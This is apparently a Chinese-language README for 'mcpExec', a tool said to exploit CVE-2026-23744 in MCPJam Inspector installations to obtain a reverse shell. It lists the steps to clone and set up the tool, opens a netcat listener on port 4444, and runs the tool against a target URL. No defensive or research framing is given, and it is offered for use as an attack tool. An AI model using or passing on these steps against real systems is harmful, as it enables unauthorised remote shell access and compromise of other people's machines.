mcpExec 是一个利用 CVE-2026-23744 漏洞,通过易受攻击的 MCPJam Inspector 安装的 URL 来获取反向 Shell 的工具。
git clone https://github.com/daemoncibsec/mcpExec.git
cd mcpExec
python3 -m venv venv
source venv/bin/activate
pip install rich
pip install argparse
pip install requests
chmod +x mcpExec.py
要退出虚拟环境:
deactivate
打开一个监听器以利用漏洞:
nc -nvlp 4444
该命令将为你提供反向 Shell(如果受影响系统已安装 Python3)。
./mcpExec.py http://localhost:6274